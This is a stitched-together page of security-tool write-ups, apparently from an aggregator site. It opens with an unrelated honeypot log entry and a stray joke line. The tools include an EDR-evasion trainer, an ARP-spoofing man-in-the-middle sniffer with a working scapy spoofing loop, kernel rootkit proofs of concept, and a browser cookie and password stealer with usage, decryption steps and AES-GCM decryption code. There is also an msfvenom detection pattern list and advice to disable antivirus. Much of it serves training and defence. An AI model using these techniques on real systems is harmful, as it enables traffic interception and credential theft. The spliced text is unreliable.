{"timestamp":"2024-01-01T05:51:40.812831","srcIP":"::1","srcHost":"localhost","tags":null,"srcPort":"62205","sensorName":"home-sensor","port":"8888","httpRequest":{"method":"GET","protocolVersion":"HTTP/1.1","request":"/i-mean-are-you-a-fake-server","userAgent":"curl/7.71.1","headers":"User-Agent: [curl/7.71.1], Accept: [*/*]","headersSorted":"Accept,User-Agent","headersSortedSha256":"cf69e186169279bd51769f29d122b07f1f9b7e51bf119c340b66fbd2a1128bc9","body":"","bodySha256":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"},"httpResponse":{"headers":{"Connection":"close","Content-Type":"text/plain","Server":"LocalHost/1.0"},"body":"No, I am not a fake server."}}

You're a galah, mate!



CrimsonEDR - Simulate The Behavior Of AV/EDR For Malware Development Training

By: Zion3R
28 April 2024 at 12:30


CrimsonEDR is an open-source project engineered to identify specific malware patterns, offering a tool for honing skills in circumventing Endpoint Detection and Response (EDR). By leveraging diverse detection methods, it empowers users to deepen their understanding of security evasion tactics.


Features

Detection Description
Direct Syscall Detects the usage of direct system calls, often employed by malware to bypass traditional API hooks.
NTDLL Unhooking Identifies attempts to unhook functions within the NTDLL library, a common evasion technique.
AMSI Patch Detects modifications to the Anti-Malware Scan Interface (AMSI) through byte-level analysis.
ETW Patch Detects byte-level alterations to Event Tracing for Windows (ETW), commonly manipulated by malware to evade detection.
PE Stomping Identifies instances of PE (Portable Executable) stomping.
Reflective PE Loading Detects the reflective loading of PE files, a technique employed by malware to avoid static analysis.
Unbacked Thread Origin Identifies threads originating from unbacked memory regions, often indicative of malicious activity.
Unbacked Thread Start Address Detects threads with start addresses pointing to unbacked memory, a potential sign of code injection.
API hooking Places a hook on the NtWriteVirtualMemory function to monitor memory modifications.
Custom Pattern Search Allows users to search for specific patterns provided in a JSON file, facilitating the identification of known malware signatures.

Installation

To get started with CrimsonEDR, follow these steps:

  1. Install dependency: sudo apt-get install gcc-mingw-w64-x86-64
  2. Clone the repository: git clone https://github.com/Helixo32/CrimsonEDR
  3. Compile the project: cd CrimsonEDR; chmod +x compile.sh; ./compile.sh

⚠️ Warning

Windows Defender and other antivirus programs may flag the DLL as malicious due to its content containing bytes used to verify if the AMSI has been patched. Please ensure to whitelist the DLL or disable your antivirus temporarily when using CrimsonEDR to avoid any interruptions.

Usage

To use CrimsonEDR, follow these steps:

  1. Make sure the ioc.json file is placed in the current directory from which the executable being monitored is launched. For example, if you launch your executable to monitor from C:\Users\admin\, the DLL will look for ioc.json in C:\Users\admin\ioc.json. Currently, ioc.json contains patterns related to msfvenom. You can easily add your own in the following format (a helper for generating these patterns programmatically is sketched after the usage example below):
{
"IOC": [
["0x03", "0x4c", "0x24", "0x08", "0x45", "0x39", "0xd1", "0x75"],
["0xf1", "0x4c", "0x03", "0x4c", "0x24", "0x08", "0x45", "0x39"],
["0x58", "0x44", "0x8b", "0x40", "0x24", "0x49", "0x01", "0xd0"],
["0x66", "0x41", "0x8b", "0x0c", "0x48", "0x44", "0x8b", "0x40"],
["0x8b", "0x0c", "0x48", "0x44", "0x8b", "0x40", "0x1c", "0x49"],
["0x01", "0xc1", "0x38", "0xe0", "0x75", "0xf1", "0x4c", "0x03"],
["0x24", "0x49", "0x01", "0xd0", "0x66", "0x41", "0x8b", "0x0c"],
["0xe8", "0xcc", "0x00", "0x00", "0x00", "0x41", "0x51", "0x41"]
]
}
  2. Execute CrimsonEDRPanel.exe with the following arguments:

    • -d <path_to_dll>: Specifies the path to the CrimsonEDR.dll file.

    • -p <process_id>: Specifies the Process ID (PID) of the target process where you want to inject the DLL.

For example:

.\CrimsonEDRPanel.exe -d C:\Temp\CrimsonEDR.dll -p 1234
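
If you prefer to generate ioc.json patterns programmatically instead of writing the hex strings by hand, a short Python helper along these lines works (a sketch; the byte sequence is copied from the first example pattern above):

import json

pattern_bytes = b"\x03\x4c\x24\x08\x45\x39\xd1\x75"  # bytes from the first IOC row above

# ioc.json expects each pattern as a list of "0x.." byte strings.
pattern = ["0x{:02x}".format(b) for b in pattern_bytes]

with open("ioc.json", "w") as f:
    json.dump({"IOC": [pattern]}, f, indent=2)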

Useful Links

Here are some useful resources that helped in the development of this project:

Contact

For questions, feedback, or support, please reach out to me via:



Url-Status-Checker - Tool For Swiftly Checking The Status Of URLs

By: Zion3R
27 April 2024 at 16:55



Status Checker is a Python script that checks the status of one or multiple URLs/domains and categorizes them based on their HTTP status codes. Version 1.0.0, created by BLACK-SCORP10 (t.me/BLACK-SCORP10).

Features

  • Check the status of single or multiple URLs/domains.
  • Asynchronous HTTP requests for improved performance (see the sketch after this list).
  • Color-coded output for better visualization of status codes.
  • Progress bar when checking multiple URLs.
  • Save results to an output file.
  • Error handling for inaccessible URLs and invalid responses.
  • Command-line interface for easy usage.
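
The asynchronous checking idea can be illustrated with a minimal aiohttp sketch (not the tool's actual code; aiohttp is an assumed extra dependency here):

import asyncio
import aiohttp

async def check(session, url):
    try:
        async with session.get(url) as response:
            return url, response.status
    except aiohttp.ClientError:
        return url, None  # inaccessible URL

async def main(urls):
    async with aiohttp.ClientSession() as session:
        results = await asyncio.gather(*(check(session, u) for u in urls))
        for url, status in results:
            print(url, status if status is not None else "unreachable")

asyncio.run(main(["https://example.com", "https://example.org"]))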

Installation

  1. Clone the repository:

git clone https://github.com/your_username/status-checker.git
cd status-checker

  2. Install dependencies:

pip install -r requirements.txt

Usage

python status_checker.py [-h] [-d DOMAIN] [-l LIST] [-o OUTPUT] [-v] [-update]
  • -d, --domain: Single domain/URL to check.
  • -l, --list: File containing a list of domains/URLs to check.
  • -o, --output: File to save the output.
  • -v, --version: Display version information.
  • -update: Update the tool.

Example:

python status_checker.py -l urls.txt -o results.txt

Preview:

License

This project is licensed under the MIT License - see the LICENSE file for details.



CSAF - Cyber Security Awareness Framework

By: Zion3R
26 April 2024 at 12:30

The Cyber Security Awareness Framework (CSAF) is a structured approach aimed at enhancing cybersecurity awareness and understanding among individuals, organizations, and communities. It provides guidance for the development of effective cybersecurity awareness programs, covering key areas such as assessing awareness needs, creating educational materials, conducting training and simulations, implementing communication campaigns, and measuring awareness levels. By adopting this framework, organizations can foster a robust security culture, enhance their ability to detect and respond to cyber threats, and mitigate the risks associated with attacks and security breaches.


Requirements

Software

  • Docker
  • Docker-compose

Hardware

Minimum

  • 4 Core CPU
  • 10GB RAM
  • 60GB Disk free

Recommendation

  • 8 Core CPU or above
  • 16GB RAM or above
  • 100GB Disk free or above

Installation

Clone the repository

git clone https://github.com/csalab-id/csaf.git

Navigate to the project directory

cd csaf

Pull the Docker images

docker-compose --profile=all pull

Generate wazuh ssl certificate

docker-compose -f generate-indexer-certs.yml run --rm generator

For security reasons, you should first set environment variables like this:

export ATTACK_PASS=ChangeMePlease
export DEFENSE_PASS=ChangeMePlease
export MONITOR_PASS=ChangeMePlease
export SPLUNK_PASS=ChangeMePlease
export GOPHISH_PASS=ChangeMePlease
export MAIL_PASS=ChangeMePlease
export PURPLEOPS_PASS=ChangeMePlease

Start all the containers

docker-compose --profile=all up -d

You can run specific profiles for running specific labs with the following profiles:
  • all
  • attackdefenselab
  • phisinglab
  • breachlab
  • soclab

For example

docker-compose --profile=attackdefenselab up -d

Proof



Exposed Ports

An exposed port can be accessed using a proxy socks5 client, SSH client, or HTTP client. Choose one for the best experience.

  • Port 6080 (Access to attack network)
  • Port 7080 (Access to defense network)
  • Port 8080 (Access to monitor network)

Example usage

Access internal network with proxy socks5

  • curl --proxy socks5://ipaddress:6080 http://10.0.0.100/vnc.html
  • curl --proxy socks5://ipaddress:7080 http://10.0.1.101/vnc.html
  • curl --proxy socks5://ipaddress:8080 http://10.0.3.102/vnc.html

Remote ssh with ssh client

  • ssh kali@ipaddress -p 6080 (default password: attackpassword)
  • ssh kali@ipaddress -p 7080 (default password: defensepassword)
  • ssh kali@ipaddress -p 8080 (default password: monitorpassword)

Access kali linux desktop with curl / browser

  • curl http://ipaddress:6080/vnc.html
  • curl http://ipaddress:7080/vnc.html
  • curl http://ipaddress:8080/vnc.html

Domain Access

  • http://attack.lab/vnc.html (default password: attackpassword)
  • http://defense.lab/vnc.html (default password: defensepassword)
  • http://monitor.lab/vnc.html (default password: monitorpassword)
  • https://gophish.lab:3333/ (default username: admin, default password: gophishpassword)
  • https://server.lab/ (default username: [email protected], default password: mailpassword)
  • https://server.lab/iredadmin/ (default username: [email protected], default password: mailpassword)
  • https://mail.server.lab/ (default username: [email protected], default password: mailpassword)
  • https://mail.server.lab/iredadmin/ (default username: [email protected], default password: mailpassword)
  • http://phising.lab/
  • http://10.0.0.200:8081/
  • http://gitea.lab/ (default username: csalab, default password: giteapassword)
  • http://dvwa.lab/ (default username: admin, default password: password)
  • http://dvwa-monitor.lab/ (default username: admin, default password: password)
  • http://dvwa-modsecurity.lab/ (default username: admin, default password: password)
  • http://wackopicko.lab/
  • http://juiceshop.lab/
  • https://wazuh-indexer.lab:9200/ (default username: admin, default password: SecretPassword)
  • https://wazuh-manager.lab/
  • https://wazuh-dashboard.lab:5601/ (default username: admin, default password: SecretPassword)
  • http://splunk.lab/ (default username: admin, default password: splunkpassword)
  • https://infectionmonkey.lab:5000/
  • http://purpleops.lab/ (default username: [email protected], default password: purpleopspassword)
  • http://caldera.lab/ (default username: red/blue, default password: calderapassword)

Network / IP Address

Attack

  • 10.0.0.100 attack.lab
  • 10.0.0.200 phising.lab
  • 10.0.0.201 server.lab
  • 10.0.0.201 mail.server.lab
  • 10.0.0.202 gophish.lab
  • 10.0.0.110 infectionmonkey.lab
  • 10.0.0.111 mongodb.lab
  • 10.0.0.112 purpleops.lab
  • 10.0.0.113 caldera.lab

Defense

  • 10.0.1.101 defense.lab
  • 10.0.1.10 dvwa.lab
  • 10.0.1.13 wackopicko.lab
  • 10.0.1.14 juiceshop.lab
  • 10.0.1.20 gitea.lab
  • 10.0.1.110 infectionmonkey.lab
  • 10.0.1.112 purpleops.lab
  • 10.0.1.113 caldera.lab

Monitor

  • 10.0.3.201 server.lab
  • 10.0.3.201 mail.server.lab
  • 10.0.3.9 mariadb.lab
  • 10.0.3.10 dvwa.lab
  • 10.0.3.11 dvwa-monitor.lab
  • 10.0.3.12 dvwa-modsecurity.lab
  • 10.0.3.102 monitor.lab
  • 10.0.3.30 wazuh-manager.lab
  • 10.0.3.31 wazuh-indexer.lab
  • 10.0.3.32 wazuh-dashboard.lab
  • 10.0.3.40 splunk.lab

Public

  • 10.0.2.101 defense.lab
  • 10.0.2.13 wackopicko.lab

Internet

  • 10.0.4.102 monitor.lab
  • 10.0.4.30 wazuh-manager.lab
  • 10.0.4.32 wazuh-dashboard.lab
  • 10.0.4.40 splunk.lab

Internal

  • 10.0.5.100 attack.lab
  • 10.0.5.12 dvwa-modsecurity.lab
  • 10.0.5.13 wackopicko.lab

License

This Docker Compose application is released under the MIT License. See the LICENSE file for details.



Espionage - A Linux Packet Sniffing Suite For Automated MiTM Attacks

By: Zion3R
25 April 2024 at 12:30

Espionage is a network packet sniffer that intercepts large amounts of data passing through an interface. The tool allows users to run normal and verbose traffic analysis that shows a live feed of traffic, revealing packet direction, protocols, flags, etc. Espionage can also spoof ARP so that all data sent by the target is redirected through the attacker (MiTM). Espionage supports IPv4, TCP/UDP, ICMP, and HTTP. Espionage was written in Python 3.8 but also supports version 3.6. This is the first version of the tool, so please contact the developer if you want to help contribute and add more to Espionage. Note: this is not a Scapy wrapper; scapylib only assists with HTTP requests and ARP.
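At its core, a sniffer like this reads raw frames from the interface and decodes the protocol headers itself. A minimal, hypothetical Linux-only sketch of that idea (not Espionage's actual code; requires root):

import socket
import struct

# an AF_PACKET raw socket receives every Ethernet frame seen by the host (Linux, root required)
sniffer = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.ntohs(0x0003))

while True:
    frame, _ = sniffer.recvfrom(65535)
    dst_mac, src_mac, ethertype = struct.unpack("!6s6sH", frame[:14])
    if ethertype == 0x0800:  # IPv4
        proto = frame[23]                      # protocol field of the IPv4 header
        src_ip = socket.inet_ntoa(frame[26:30])
        dst_ip = socket.inet_ntoa(frame[30:34])
        print(f"{src_ip} -> {dst_ip} (IP protocol {proto})")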


Installation

1: git clone https://www.github.com/josh0xA/Espionage.git
2: cd Espionage
3: sudo python3 -m pip install -r requirments.txt
4: sudo python3 espionage.py --help

Usage

  1. sudo python3 espionage.py --normal --iface wlan0 -f capture_output.pcap
    Command 1 will execute a clean packet sniff and save the output to the pcap file provided. Replace wlan0 with whatever your network interface is.
  2. sudo python3 espionage.py --verbose --iface wlan0 -f capture_output.pcap
    Command 2 will execute a more detailed (verbose) packet sniff and save the output to the pcap file provided.
  3. sudo python3 espionage.py --normal --iface wlan0
    Command 3 will still execute a clean packet sniff; however, it will not save the data to a pcap file. Saving the sniff is recommended.
  4. sudo python3 espionage.py --verbose --httpraw --iface wlan0
    Command 4 will execute a verbose packet sniff and will also show raw HTTP/TCP packet data in bytes.
  5. sudo python3 espionage.py --target <target-ip-address> --iface wlan0
    Command 5 will ARP spoof the target IP address so that all data it sends is routed back to the attacker's machine (you/localhost); see the ARP-spoofing sketch after this list.
  6. sudo python3 espionage.py --iface wlan0 --onlyhttp
    Command 6 will only display sniffed packets on port 80 utilizing the HTTP protocol.
  7. sudo python3 espionage.py --iface wlan0 --onlyhttpsecure
    Command 7 will only display sniffed packets on port 443 utilizing the HTTPS (secured) protocol.
  8. sudo python3 espionage.py --iface wlan0 --urlonly
    Command 8 will only sniff and return URLs visited by the victim (works best with sslstrip).

  9. Press Ctrl+C in order to stop the packet interception and write the output to file.
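For reference, the ARP-spoofing step boils down to repeatedly sending forged ARP replies to the target and the gateway so that both associate the attacker's MAC with the other's IP. A minimal sketch with scapy (placeholder addresses; this is an illustration, not Espionage's own implementation; run as root):

import time
from scapy.all import ARP, send

target_ip, gateway_ip = "192.168.1.50", "192.168.1.1"   # hypothetical addresses

try:
    while True:
        # tell the target we are the gateway, and the gateway we are the target
        send(ARP(op=2, pdst=target_ip, psrc=gateway_ip), verbose=False)
        send(ARP(op=2, pdst=gateway_ip, psrc=target_ip), verbose=False)
        time.sleep(2)
except KeyboardInterrupt:
    pass  # on exit you would normally restore the real ARP entries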

Menu

usage: espionage.py [-h] [--version] [-n] [-v] [-url] [-o] [-ohs] [-hr] [-f FILENAME] -i IFACE
[-t TARGET]

optional arguments:
-h, --help show this help message and exit
--version returns the packet sniffers version.
-n, --normal executes a cleaner interception, less sophisticated.
-v, --verbose (recommended) executes a more in-depth packet interception/sniff.
-url, --urlonly only sniffs visited urls using http/https.
-o, --onlyhttp sniffs only tcp/http data, returns urls visited.
-ohs, --onlyhttpsecure
sniffs only https data, (port 443).
-hr, --httpraw displays raw packet data (byte order) recieved or sent on port 80.

(Recommended) arguments for data output (.pcap):
-f FILENAME, --filename FILENAME
name of file to store the output (make extension '.pcap').

(Required) arguments required for execution:
-i IFACE, --iface IFACE
specify network interface (ie. wlan0, eth0, wlan1, etc.)

(ARP Spoofing) required arguments in-order to use the ARP Spoofing utility:
-t TARGET, --target TARGET


Writeup

A simple medium writeup can be found here:
Click Here For The Official Medium Article

Ethical Notice

The developer of this program, Josh Schiavone, wrote the following code for educational and ethical purposes only. The data sniffed/intercepted is not to be used for malicious intent. Josh Schiavone is not responsible or liable for misuse of this penetration testing tool. May God bless you all.

License

MIT License
Copyright (c) 2024 Josh Schiavone




HackerInfo - Information Gathering For Web Application Security

By: Zion3R
24 April 2024 at 12:30




Information gathering for web application security


Install:

sudo apt install python3 python3-pip

pip3 install termcolor

pip3 install google

pip3 install optioncomplete

pip3 install bs4


pip3 install prettytable

git clone https://github.com/Matrix07ksa/HackerInfo/

cd HackerInfo

chmod +x HackerInfo

./HackerInfo -h



python3 HackerInfo.py -d www.facebook.com -f pdf
[+] <-- Running Domain_filter_File ....-->
[+] <-- Searching [www.facebook.com] Files [pdf] ....-->
https://www.facebook.com/gms_hub/share/dcvsda_wf.pdf
https://www.facebook.com/gms_hub/share/facebook_groups_for_pages.pdf
https://www.facebook.com/gms_hub/share/videorequirementschart.pdf
https://www.facebook.com/gms_hub/share/fundraise-on-facebook_hi_in.pdf
https://www.facebook.com/gms_hub/share/bidding-strategy_decision-tree_en_us.pdf
https://www.facebook.com/gms_hub/share/fundraise-on-facebook_es_la.pdf
https://www.facebook.com/gms_hub/share/fundraise-on-facebook_ar.pdf
https://www.facebook.com/gms_hub/share/fundraise-on-facebook_ur_pk.pdf
https://www.facebook.com/gms_hub/share/fundraise-on-facebook_cs_cz.pdf
https://www.facebook.com/gms_hub/share/fundraise-on-facebook_it_it.pdf
https://www.facebook.com/gms_hub/share/fundraise-on-facebook_pl_pl.pdf
https://www.facebook.com/gms_hub/share/fundraise-on-facebook_nl.pdf
https://www.facebook.com/gms_hub/share/fundraise-on-facebook_pt_br.pdf
https://www.facebook.com/gms_hub/share/creative-best-practices_id_id.pdf
https://www.facebook.com/gms_hub/share/creative-best-practices_fr_fr.pdf
https://www.facebook.com/gms_hub/share/fundraise-on-facebook_tr_tr.pdf
https://www.facebook.com/gms_hub/share/creative-best-practices_hi_in.pdf
https://www.facebook.com/rsrc.php/yA/r/AVye1Rrg376.pdf
https://www.facebook.com/gms_hub/share/creative-best-practices_ur_pk.pdf
https://www.facebook.com/gms_hub/share/creative-best-practices_nl_nl.pdf
https://www.facebook.com/gms_hub/share/creative-best-practices_de_de.pdf
https://www.facebook.com/gms_hub/share/fundraise-on-facebook_de_de.pdf
https://www.facebook.com/gms_hub/share/creative-best-practices_cs_cz.pdf
https://www.facebook.com/gms_hub/share/fundraise-on-facebook_sk_sk.pdf
https://www.facebook.com/gms_hub/share/creative-best-practices_japanese_jp.pdf
#####################[Finshid]########################
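The search above is essentially a site:/filetype: Google dork. A minimal sketch of the same idea using the googlesearch module installed above (the query and result count are illustrative, not HackerInfo's own code):

from googlesearch import search  # provided by the "google" pip package

# find PDF files indexed under a target domain via a Google dork
query = "site:www.facebook.com filetype:pdf"

for url in search(query, num=20, stop=20, pause=2.0):
    print(url)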

Usage:


To install the hackinfo library:

sudo python setup.py install
pip3 install hackinfo



C2-Tracker - Live Feed Of C2 Servers, Tools, And Botnets

By: Zion3R
24 April 2024 at 02:23


Free-to-use IOC feed for various tools/malware. It started out for just C2 tools but has morphed into tracking infostealers and botnets as well. It uses Shodan searches to collect the IPs. The most recent collection is always stored in data; the IPs are broken down by tool and there is an all.txt.

The feed should update daily. I am actively working on making the backend more reliable.


Honorable Mentions

Many of the Shodan queries have been sourced from other CTI researchers:

Huge shoutout to them!

Thanks to BertJanCyber for creating the KQL query for ingesting this feed

And finally, thanks to Y_nexro for creating C2Live in order to visualize the data

What do I track?

Running Locally

If you want to host a private version, put your Shodan API key in an environment variable called SHODAN_API_KEY

echo SHODAN_API_KEY=API_KEY >> ~/.bashrc
bash
python3 -m pip install -r requirements.txt
python3 tracker.py
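Under the hood, the collection step amounts to running one Shodan search per tool and saving the matching IPs. A minimal sketch with the shodan library (the query is only an example and not necessarily one the project uses):

import os
import shodan

api = shodan.Shodan(os.environ["SHODAN_API_KEY"])

# example query for a single tool; a real tracker keeps one query per tool/malware family
results = api.search('product:"Cobalt Strike Beacon"')

ips = sorted({match["ip_str"] for match in results["matches"]})
with open("example_tool.txt", "w") as fh:
    fh.write("\n".join(ips) + "\n")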

Contributing

I encourage opening an issue/PR if you know of any additional Shodan searches for identifying adversary infrastructure. I will not set any hard guidelines around what can be submitted; just know that fidelity is paramount (a high ratio of true positives to false positives is the focus).

References



VectorKernel - PoCs For Kernelmode Rootkit Techniques Research

By: Zion3R
18 April 2024 at 12:30


PoCs for kernel-mode rootkit technique research and education. Currently focusing on Windows OS. All modules support 64-bit OSes only.

NOTE

Some modules use the ExAllocatePool2 API to allocate kernel pool memory. The ExAllocatePool2 API is not supported on OSes older than Windows 10 version 2004. If you want to test the modules on older OSes, replace the ExAllocatePool2 API with the ExAllocatePoolWithTag API.


Environment

All modules are tested on Windows 11 x64. To test drivers, the following options can be used on the testing machine:

  1. Enable Loading of Test Signed Drivers

  2. Setting Up Kernel-Mode Debugging

Each option requires Secure Boot to be disabled.

Modules

Detailed information is given in the README.md of each project's directory. All modules are tested on Windows 11.

Module Name Description
BlockImageLoad PoCs to block driver loading with Load Image Notify Callback method.
BlockNewProc PoCs to block new process with Process Notify Callback method.
CreateToken PoCs to get full privileged SYSTEM token with ZwCreateToken() API.
DropProcAccess PoCs to drop process handle access with Object Notify Callback.
GetFullPrivs PoCs to get full privileges with DKOM method.
GetProcHandle PoCs to get full access process handle from kernelmode.
InjectLibrary PoCs to perform DLL injection with Kernel APC Injection method.
ModHide PoCs to hide loaded kernel drivers with DKOM method.
ProcHide PoCs to hide process with DKOM method.
ProcProtect PoCs to manipulate Protected Process.
QueryModule PoCs to perform retrieving kernel driver loaded address information.
StealToken PoCs to perform token stealing from kernelmode.

TODO

More PoCs, especially about the following, will be added later:

  • Notify callback
  • Filesystem mini-filter
  • Network mini-filter

Recommended References



Cookie-Monster - BOF To Steal Browser Cookies & Credentials

By: Zion3R
17 April 2024 at 12:30


Steal browser cookies for Edge, Chrome, and Firefox through a BOF or exe! Cookie-Monster will extract the WebKit master key, locate a browser process with a handle to the Cookies and Login Data files, copy the handle(s), and then filelessly download the target files. Once the Cookies/Login Data file(s) are downloaded, the Python decryption script can help extract those secrets! The Firefox module will parse profiles.ini, locate the logins.json and key4.db files, and download them. A separate GitHub repo is referenced for offline decryption.


BOF Usage

Usage: cookie-monster [ --chrome || --edge || --firefox || --chromeCookiePID <pid> || --chromeLoginDataPID <PID> || --edgeCookiePID <pid> || --edgeLoginDataPID <pid>] 
cookie-monster Example:
cookie-monster --chrome
cookie-monster --edge
cookie-monster --firefox
cookie-monster --chromeCookiePID 1337
cookie-monster --chromeLoginDataPID 1337
cookie-monster --edgeCookiePID 4444
cookie-monster --edgeLoginDataPID 4444
cookie-monster Options:
--chrome, looks at all running processes and handles, if one matches chrome.exe it copies the handle to Cookies/Login Data and then copies the file to the CWD
--edge, looks at all running processes and handles, if one matches msedge.exe it copies the handle to Cookies/Login Data and then copies the file to the CWD
--firefox, looks for profiles.ini and locates the key4.db and logins.json file
--chromeCookiePID, if a chrome process with a handle to the Cookies file is already known, specify its PID to duplicate the handle and download the file
--chromeLoginDataPID, if a chrome process with a handle to the Login Data file is already known, specify its PID to duplicate the handle and download the file
--edgeCookiePID, if an edge process with a handle to the Cookies file is already known, specify its PID to duplicate the handle and download the file
--edgeLoginDataPID, if an edge process with a handle to the Login Data file is already known, specify its PID to duplicate the handle and download the file

EXE usage

Cookie Monster Example:
cookie-monster.exe --all
Cookie Monster Options:
-h, --help Show this help message and exit
--all Run chrome, edge, and firefox methods
--edge Extract edge keys and download Cookies/Login Data file to PWD
--chrome Extract chrome keys and download Cookies/Login Data file to PWD
--firefox Locate firefox key and Cookies, does not make a copy of either file

Decryption Steps

Install requirements

pip3 install -r requirements.txt

Base64 encode the webkit masterkey

python3 base64-encode.py "\xec\xfc...."

Decrypt Chrome/Edge Cookies File

python .\decrypt.py "XHh..." --cookies ChromeCookie.db

Results Example:
-----------------------------------
Host: .github.com
Path: /
Name: dotcom_user
Cookie: KingOfTheNOPs
Expires: Oct 28 2024 21:25:22

Host: github.com
Path: /
Name: user_session
Cookie: x123.....
Expires: Nov 11 2023 21:25:22

Decrypt Chrome/Edge Passwords File

python .\decrypt.py "XHh..." --passwords ChromePasswords.db

Results Example:
-----------------------------------
URL: https://test.com/
Username: tester
Password: McTesty
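
For reference, Chromium-based browsers store each cookie or password value as a "v10" blob encrypted with AES-256-GCM under the WebKit master key, which is what the decryption step above relies on. A minimal sketch of that decryption (assuming pycryptodome; this is an illustration, not the project's decrypt.py):

from Crypto.Cipher import AES  # pip3 install pycryptodome

def decrypt_v10(blob: bytes, master_key: bytes) -> str:
    # Chromium layout: b"v10" | 12-byte GCM nonce | ciphertext | 16-byte tag
    nonce, payload = blob[3:15], blob[15:]
    ciphertext, tag = payload[:-16], payload[-16:]
    cipher = AES.new(master_key, AES.MODE_GCM, nonce=nonce)
    return cipher.decrypt_and_verify(ciphertext, tag).decode("utf-8", "replace")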

Decrypt Firefox Cookies and Stored Credentials:
https://github.com/lclevy/firepwd

Installation

Ensure Mingw-w64 and make are installed on Linux prior to compiling.

make

To compile the exe on Windows:

gcc .\cookie-monster.c -o cookie-monster.exe -lshlwapi -lcrypt32

TO-DO

  • update decrypt.py to support firefox based on firepwd and add bruteforce module based on DonPAPI

References

This project could not have been done without the help of Mr-Un1k0d3r and his amazing seasonal videos! Highly recommend checking out his lessons!!!
Cookie Webkit Master Key Extractor: https://github.com/Mr-Un1k0d3r/Cookie-Graber-BOF
Fileless download: https://github.com/fortra/nanodump
Decrypt Cookies and Login Data: https://github.com/login-securite/DonPAPI


